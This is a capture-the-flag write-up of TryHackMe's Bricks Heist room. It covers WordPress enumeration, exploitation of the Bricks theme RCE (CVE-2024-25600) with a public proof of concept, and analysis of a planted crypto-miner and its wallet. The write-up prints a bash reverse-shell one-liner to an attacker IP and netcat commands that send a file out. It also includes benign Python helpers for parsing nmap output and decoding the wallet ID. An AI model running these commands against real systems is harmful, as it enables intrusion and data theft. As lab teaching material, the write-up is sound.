TryHack3M: Bricks Heist

2ea5dc646449d5713b63aab241ead431.png

Target IP: 10.10.111.103
Challenge Description:
fa779db3f9f56ccf33d5a223d3691166.png


Reconnaissance

0f69c05d442672d83649ff929e2daf58.png
The challenge asks me to add the hostname to my /etc/hosts file, so I added bricks.thm there, as shown above. Time to begin the reconnaissance.

0e1809f0fa4a3b308016d7bde0935c64.png
Performing a port scan with the command sudo nmap -sS bricks.thm -p- returns the result shown above. By the looks of it, four TCP ports are open on the target machine: SSH, HTTP, HTTPS, and MySQL. Time to perform further reconnaissance to identify the services behind these ports.

┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/TryHack3M:BricksHeist]
└─$ sudo nmap -sV -A bricks.thm -p 22,80,443,3306
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-24 20:27 UTC
Nmap scan report for bricks.thm (10.10.111.103)
Host is up (0.023s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 8e:e4:a7:c3:91:b7:7e:dc:c4:ae:7e:3e:e6:3c:f2:57 (RSA)
|   256 79:ea:dd:5e:06:c7:19:58:ab:eb:49:b9:d9:e7:01:e1 (ECDSA)
|_  256 00:37:32:64:04:b4:80:40:db:8c:62:ad:1f:49:f0:82 (ED25519)
80/tcp   open  http     WebSockify Python/3.8.10
|_http-title: Error response
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 405 Method Not Allowed
|     Server: WebSockify Python/3.8.10
|     Date: Wed, 24 Apr 2024 20:27:37 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 472
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 405</p>
|     <p>Message: Method Not Allowed.</p>
|     <p>Error code explanation: 405 - Specified method is invalid for this resource.</p>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 501 Unsupported method ('OPTIONS')
|     Server: WebSockify Python/3.8.10
|     Date: Wed, 24 Apr 2024 20:27:37 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 500
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 501</p>
|     <p>Message: Unsupported method ('OPTIONS').</p>
|     <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
|     </body>
|_    </html>
|_http-server-header: WebSockify Python/3.8.10
443/tcp  open  ssl/http Apache httpd
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache
|_http-generator: WordPress 6.5
|_http-title: Brick by Brick
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-04-02T11:59:14
|_Not valid after:  2025-04-02T11:59:14
3306/tcp open  mysql    MySQL (unauthorized)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94%I=7%D=4/24%Time=66296B35%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,291,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x20
SF:WebSockify\x20Python/3\.8\.10\r\nDate:\x20Wed,\x2024\x20Apr\x202024\x20
SF:20:27:37\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20text/html;c
SF:harset=utf-8\r\nContent-Length:\x20472\r\n\r\n<!DOCTYPE\x20HTML\x20PUBL
SF:IC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x2
SF:0\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Cont
SF:ent-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20</head>\
SF:n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20r
SF:esponse</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20405<
SF:/p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Method\x20Not\x20Al
SF:lowed\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20explan
SF:ation:\x20405\x20-\x20Specified\x20method\x20is\x20invalid\x20for\x20th
SF:is\x20resource\.</p>\n\x20\x20\x20\x20</body>\n</html>\n")%r(HTTPOption
SF:s,2B9,"HTTP/1\.1\x20501\x20Unsupported\x20method\x20\('OPTIONS'\)\r\nSe
SF:rver:\x20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Wed,\x2024\x20Apr\x2
SF:02024\x2020:27:37\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20te
SF:xt/html;charset=utf-8\r\nContent-Length:\x20500\r\n\r\n<!DOCTYPE\x20HTM
SF:L\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x
SF:20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x
SF:20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equ
SF:iv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x2
SF:0</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>E
SF:rror\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code
SF::\x20501</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Unsupporte
SF:d\x20method\x20\('OPTIONS'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>
SF:Error\x20code\x20explanation:\x20HTTPStatus\.NOT_IMPLEMENTED\x20-\x20Se
SF:rver\x20does\x20not\x20support\x20this\x20operation\.</p>\n\x20\x20\x20
SF:\x20</body>\n</html>\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   23.15 ms 10.14.0.1
2   23.62 ms bricks.thm (10.10.111.103)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.61 seconds

I ran the command sudo nmap -sV -A bricks.thm -p 22,80,443,3306 to gather more information about the four TCP ports and obtained the result shown above. The web applications on ports 80 and 443 sound the most interesting to me, so I will likely begin my enumeration there. The scan result for the web application on port 443 shows a robots.txt disallowed entry of /wp-admin/, which is worth a look. The MySQL service, on the other hand, does not allow me to connect.
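As an added example (my own code, not part of the original write-up and not an nmap tool), here is a small Python parser for the normal-output format above. It turns each port line and its NSE script output into a record, so the service versions, the WordPress generator tag and the robots.txt entries can be pulled out programmatically and compared against an asset inventory instead of being read off a screenshot. SAMPLE_SCAN is a trimmed, constructed copy of the scan above; the function and field names are my own.

```python
import re
from typing import Dict, List, Optional

# Constructed sample input: a trimmed copy of the relevant lines from the
# nmap -sV -A output above (ports, service versions and NSE script output).
SAMPLE_SCAN = """\
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 8e:e4:a7:c3:91:b7:7e:dc:c4:ae:7e:3e:e6:3c:f2:57 (RSA)
|_  256 00:37:32:64:04:b4:80:40:db:8c:62:ad:1f:49:f0:82 (ED25519)
80/tcp   open  http     WebSockify Python/3.8.10
|_http-title: Error response
|_http-server-header: WebSockify Python/3.8.10
443/tcp  open  ssl/http Apache httpd
| tls-alpn:
|   h2
|_  http/1.1
|_http-server-header: Apache
|_http-generator: WordPress 6.5
|_http-title: Brick by Brick
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
3306/tcp open  mysql    MySQL (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# "22/tcp   open  ssh      OpenSSH 8.2p1 ..." -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "| script-name: value" or "|_script-name: value" (first line of a script's output);
# indented continuation lines such as "|_/wp-admin/" do not match and are appended.
SCRIPT_RE = re.compile(r"^\|(?:_| )([\w.-]+):\s?(.*)$")


def parse_nmap(text: str) -> List[Dict]:
    """Parse nmap 'normal' output into one record per port, keeping NSE script lines."""
    ports: List[Dict] = []
    current: Optional[Dict] = None
    script: Optional[str] = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": m.group(5).strip(), "scripts": {},
            }
            ports.append(current)
            script = None
            continue
        if current is None or not line.startswith("|"):
            continue  # banner, OS guesses, traceroute: not per-port data
        m = SCRIPT_RE.match(line)
        if m:
            script = m.group(1)
            value = m.group(2).strip()
            current["scripts"][script] = [value] if value else []
        elif script is not None:
            current["scripts"][script].append(line[2:].strip())
    return ports


def open_ports(ports: List[Dict]) -> List[int]:
    return [p["port"] for p in ports if p["state"] == "open"]


def wordpress_version(ports: List[Dict]) -> Optional[str]:
    """Version disclosed by the <meta name="generator"> tag, as reported by http-generator."""
    for p in ports:
        gen = p["scripts"].get("http-generator", [])
        if gen and gen[0].startswith("WordPress "):
            return gen[0].split(" ", 1)[1]
    return None


def robots_disallowed(ports: List[Dict]) -> List[str]:
    """Paths listed under http-robots.txt (the count line is skipped)."""
    return [e for p in ports for e in p["scripts"].get("http-robots.txt", [])[1:]]


def findings(ports: List[Dict]) -> List[str]:
    """Exposure notes a reviewer would raise from this scan alone."""
    notes = []
    for p in ports:
        if p["state"] != "open":
            continue
        tag = f"{p['port']}/{p['proto']}"
        if p["service"] == "mysql":
            notes.append(f"{tag}: database service reachable from the network")
        for gen in p["scripts"].get("http-generator", []):
            notes.append(f"{tag}: CMS and version disclosed by generator tag: {gen}")
        for entry in p["scripts"].get("http-robots.txt", [])[1:]:
            notes.append(f"{tag}: robots.txt advertises {entry}")
    return notes


if __name__ == "__main__":
    parsed = parse_nmap(SAMPLE_SCAN)
    for p in parsed:
        print(f"{p['port']}/{p['proto']} {p['state']:5} {p['service']:9} {p['version']}")
    for note in findings(parsed):
        print(" -", note)
```

The parser only needs the port lines and the `|`-prefixed script output, so the fingerprint dump and OS guesses that nmap prints around them are ignored; pipe a saved `-oN` file into `parse_nmap` to get the same records for a real scan.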


Enumeration

Port 443: HTTPS

32690513bfa92a5086bd673b1cf6321c.png
Browsing to https://bricks.thm returns the webpage shown above. Its source code contains the web application version and other useful information.

2381675f56f5c7ffe92870d96ecfaf45.png
Running Wappalyzer on the webpage returns the useful information shown above. By the looks of it, the target machine is running WordPress 6.5. I can attack this web application further using wpscan, but before doing that I want to enumerate further.

f28918e9911ad149e9f0634b90fdffc6.png
Earlier I discovered the /wp-admin disallowed entry. Visiting it shows the page above. I tried the default credentials admin:password, but had no luck. Time to scan for hidden directories. Since the web application is served over HTTPS on port 443, TLS checks need to be disabled (the -k flag in gobuster, --disable-tls-checks in wpscan). I ran wpscan --url https://bricks.thm:443/ --enumerate u --disable-tls-checks against the target machine and identified a WordPress user called administrator. This is another attack vector: I could brute-force this user's password. Time to identify the plugins now.

2fe1ded13211a7273868307b491b77c3.png
Running wpscan --url https://bricks.thm/ --enumerate ap --plugins-detection aggressive --disable-tls-checks returned the interesting information shown above: the web application is using the Bricks theme, version 1.9.5.

e8c8bc46d964e8fbaa491bb2f74db7e6.png
And bingo! A Google search for Bricks 1.9.5 exploit led me to the interesting webpage shown above. It seems the theme is vulnerable to RCE; the CVE identifier for this vulnerability is CVE-2024-25600. Time to test it.


Exploitation

a81a467dccdb79949578c28af8d6c0bd.png
I found the PoC exploit shown above in this GitHub repository. I downloaded it to my machine by following the installation steps shown in the image above. Then I created a file named targets containing the single entry https://bricks.thm.

878dbc61a5964e354308d494fdfcdcf9.png
Running the exploit against the target machine with python exploit.py -l targets shows that the web application is vulnerable. Bingo! Time to run the interactive mode to perform RCE.

2903eed95303740f519346a7388db118.png
And voila! Running python exploit.py -u https://bricks.thm gave me a shell through the exploit. I successfully ran the commands whoami, id, and ifconfig through it, as shown above. Time to obtain a reverse shell connection now.

630d12c8c875d7ea7a546073821f65f7.png
On my machine, I started a listener on port 8443, as shown in the bottom terminal of the picture above. Then, in the exploit's shell session, I ran the command bash -c "/bin/bash -i >& /dev/tcp/10.14.55.153/8443 0>&1". This executed successfully and I obtained a reverse shell as the apache user, as shown above. Now I have a foothold on the target machine :)


Flags

ebcf309d9a0043009b1b3007a62f841d.png
The first flag is shown above after compromising the web server.

6d35a28b6148513455d269972696a76d.png
I ran the command systemctl and found an interesting entry named TRYHACK3M, as shown above. I can use systemctl status to find more information about it.

cc36d16451a57c859bb174e3af52f5f4.png
I ran systemctl status ubuntu.service and obtained the details shown above. The unit's main process is nm-inet-dialog.

dd39f535f66ca477f2768d8d04943821.png
The location of the malicious binary is shown above. To find it, I ran find / -name "nm-inet-dialog" 2>/dev/null; the binary lives in /usr/lib/NetworkManager/.

0b2dc72083c630177c3eab06feb81fdb.png
I transferred the malicious binary to my machine using netcat. On the target machine, I ran nc -w 3 10.14.55.153 1234 < nm-inet-dialog. Then, on my attack machine, I executed nc -l -p 1234 > nm-inet-dialog. The binary arrived on my machine successfully, as shown above. I ran strings on it, but did not find anything useful.

8aee3d643f20131796e5bd327e61c43b.png
I uploaded this binary to VirusTotal and obtained the result shown above. This binary is malicious.

5bd424825be00926e2a49de50d6b4995.png
The Opened Files section shows that it opens the file inet.conf, as shown above. This is unusual.

6a318dc7c84a1f4b744aa5954200d0f1.png
On the target machine, I opened /usr/lib/NetworkManager/inet.conf and obtained the result shown above. The long string under the label ID, 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d, looks interesting. Maybe it is some sort of identifier for the attacker?

1f5ebbf3181f8155c3fb885b08d74f74.png
Using CyberChef, I decoded the string and obtained the result shown above. It is the wallet address of the miner instance, bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa. Only half of the decoded string is the flag.
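As an added example (my own code, not part of the original write-up, the challenge, or CyberChef), the same decoding done in a script: the ID value is hex-encoded text that is itself base64 wrapped in base64, and the helper peels those layers one at a time until the data stops looking encoded. It goes one step further than the CyberChef recipe by running a BIP173 bech32 checksum over every bc1... candidate in the result, which is how an analyst can tell which half of the decoded string is a syntactically valid Bitcoin address before pivoting on it in a blockchain explorer. ID_VALUE is copied from the inet.conf output above; the bech32 test vector in the usage note is the one published in BIP173; everything else (function names, the peel/triage structure) is my own.

```python
import base64
import binascii
import re
from typing import List, Tuple

# Copied from the ID field shown in inet.conf above (the only page-supplied input here).
ID_VALUE = (
    "5757314e65474e5962484a4f656d787457544e424e574648555446684d307073"
    "5930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77"
    "546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531"
    "595564476130355864486c6157454a3557544a564e453959556e4a685246497a"
    "5932355363303948526a4a6b52464a7a546d706b65466c525054303d"
)

HEX_RE = re.compile(r"[0-9a-fA-F]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def peel(blob: bytes, max_layers: int = 8) -> List[Tuple[str, bytes]]:
    """Strip hex and base64 layers one at a time until the data stops looking encoded.
    Returns [(layer_name, decoded_bytes), ...] in decoding order."""
    layers: List[Tuple[str, bytes]] = []
    for _ in range(max_layers):
        try:
            text = blob.decode("ascii").strip()
        except UnicodeDecodeError:
            break  # binary payload: nothing more to peel as text
        if not text.isprintable():
            break
        if HEX_RE.fullmatch(text) and len(text) % 2 == 0:
            blob = binascii.unhexlify(text)
            layers.append(("hex", blob))
        elif B64_RE.fullmatch(text) and len(text) % 4 == 0:
            try:
                blob = base64.b64decode(text, validate=True)
            except binascii.Error:
                break
            layers.append(("base64", blob))
        else:
            break
    return layers


# BIP173 bech32 checksum (witness v0 "bc1q..." addresses use the constant 1).
BECH32_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
BECH32_GEN = [0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3]


def bech32_polymod(values: List[int]) -> int:
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk & 0x1FFFFFF) << 5) ^ v
        for i in range(5):
            if (top >> i) & 1:
                chk ^= BECH32_GEN[i]
    return chk


def bech32_verify(addr: str) -> bool:
    """True when the human-readable part plus data carries a valid bech32 checksum."""
    if addr.lower() != addr and addr.upper() != addr:
        return False  # mixed case is invalid by definition
    addr = addr.lower()
    pos = addr.rfind("1")
    if pos < 1 or pos + 7 > len(addr) or len(addr) > 90:
        return False
    hrp, data = addr[:pos], addr[pos + 1:]
    if any(c not in BECH32_CHARSET for c in data):
        return False
    values = [BECH32_CHARSET.index(c) for c in data]
    hrp_expanded = [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp]
    return bech32_polymod(hrp_expanded + values) == 1


# 'b', 'i', 'o' and '1' are not in the charset, so a second "bc1" ends the previous match.
CANDIDATE_RE = re.compile(r"bc1[" + BECH32_CHARSET + r"]{6,}")


def extract_candidates(text: str) -> List[str]:
    return CANDIDATE_RE.findall(text)


def triage(id_value: str) -> List[Tuple[str, bool]]:
    """Decode the ID field and report each bc1 candidate with its checksum result."""
    layers = peel(id_value.encode())
    final = layers[-1][1].decode("ascii", errors="replace") if layers else id_value
    return [(c, bech32_verify(c)) for c in extract_candidates(final)]


if __name__ == "__main__":
    for name, data in peel(ID_VALUE.encode()):
        print(f"{name:6} -> {data[:48]!r}{'...' if len(data) > 48 else ''}")
    for candidate, ok in triage(ID_VALUE):
        print(f"{'valid  ' if ok else 'invalid'} {candidate}")
```

Running it prints the three peeled layers and the two bc1 candidates with their checksum result; the reference P2WPKH address from BIP173, bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4, can be passed to bech32_verify as a positive control, and changing any single character of a valid address makes the check fail, which is the property that lets the script reject a near-duplicate candidate.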

a8371866ea4507cceed2c01e31be7627.png
And bingo! I found the wallet on the Blockchain explorer, as shown above. There are multiple transactions to and from this wallet address, one of them involving the address bc1q5jqgm7nvrhaw2rh2vk0dk8e4gg5g373g0vz07r. A Google search for that address turned up an article stating it is used by the threat actor group LockBit.